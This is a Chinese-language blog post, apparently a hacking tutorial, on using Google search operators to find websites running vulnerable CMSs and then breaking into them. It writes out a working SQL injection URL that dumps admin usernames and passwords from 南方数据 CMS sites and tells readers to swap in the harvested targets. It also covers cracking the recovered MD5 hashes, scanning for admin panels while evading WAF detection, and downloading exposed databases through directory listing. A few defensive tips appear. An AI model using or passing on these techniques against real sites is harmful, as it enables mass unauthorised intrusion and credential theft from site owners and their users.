Google hacker与0day漏洞利用

摘要

使用搜索引擎特殊查询语法来收集可能存在漏洞的页面。可在百度、谷歌中搜索,谷歌收录更全,能查到非常多站点。

一、Google hacker:

使用搜索引擎特殊查询语法来收集可能存在漏洞的页面。可在百度、谷歌中搜索,谷歌收录更全,能查到非常多站点。
Site:查询指定站点的收录
Inurl:url中包含关键字,例如:inurl:admin_aspcms(查aspcms后台页面)
Intitle:title中包含关键字,例如:intitle:V57_GBK_SP2(查织梦后台页面)
Intext:内容中包含关键字,例如:intext: [转到父目录](查列出目录的站点)
以上语法可混合使用,如site:qian1.top inurl:admin
常用CMS:aspcms、动易cms、南方数据cms、织梦、phpcms、帝国cms。
Aspcms:搜索inurl:admin_aspcms。
南方数据cms:inurl:HomeMarket.asp

通过百度inurl查询使用aspcms的网站
当然,也可以使用其他几个命令,只要清楚cms的特征url或标题。
还可以使用cms的指纹,也就是cms中包含某个文件,通过文件md5来准确判断是否为某个cms,很多工具就是这样识别的。
使用工具能同时采集很多搜索引擎的结果,并以txt导出。

导出后,用m7lrv、椰树等工具导入进行漏洞检测,此类工具可直接利用漏洞显示出后台账号密码。

M7lrv CMS扫描
要点:防止被google hacker(无聊拿你网站练手的脚本小子,或者到处挂马的黑产分子等)列为攻击目标,可将cms标题中的cms名称去掉、修改后台地址。不要用robots.txt,这个会暴露目录结构。

二、0day漏洞利用

0day指漏洞挖掘出来没有发布或发布时间不满1天,大部分漏洞尚未修补。上一步收集的站点可通过相应CMS的0day漏洞来爆出密码。例如搜索南方数据0day漏洞,访问漏洞利用的地址则可现实用户名密码。
漏洞利用地址:
http://www.xxx.com/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='
将xxx.com替换为收集的网站,即可得到其后台账号和密码。

https://www.secpulse.com/upload/201206/221208490ec4a4d523817031ef53350d28ebb7b8.png

爆出密码的界面(来源于网络)
密码一般为md5,可在解密网站解出明文,原理为撞库。推荐解密网站:www.somd5.com,该网站免费,库较大,破解成功率高。如网站使用默认后台,得到密码后可直接登录。否则需要扫描后台。扫描工具:清凉网站后台扫描、御剑后台扫描。注意线程多会导致WAF(D盾、安全狗、知道创宇)判断为CC攻击。

三、目录列出漏洞

Iis默认列出目录的页面包含:[转到父目录],英文版to parent directory,通过搜索intext: [转到父目录]可得到这一类网站。

直接查找目录可能得到.mdb文件,直接下载得到数据库。若数据库有#之类的特殊符号,可转码url后下载,服务器不允许下载该类型文件则无法下载。
要点:不要开启目录浏览。

总结:google hacker和0day漏洞非常简单,网络上依然有大量存在这些漏洞的站点,使用工具能轻松获取大量站点后台权限。

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: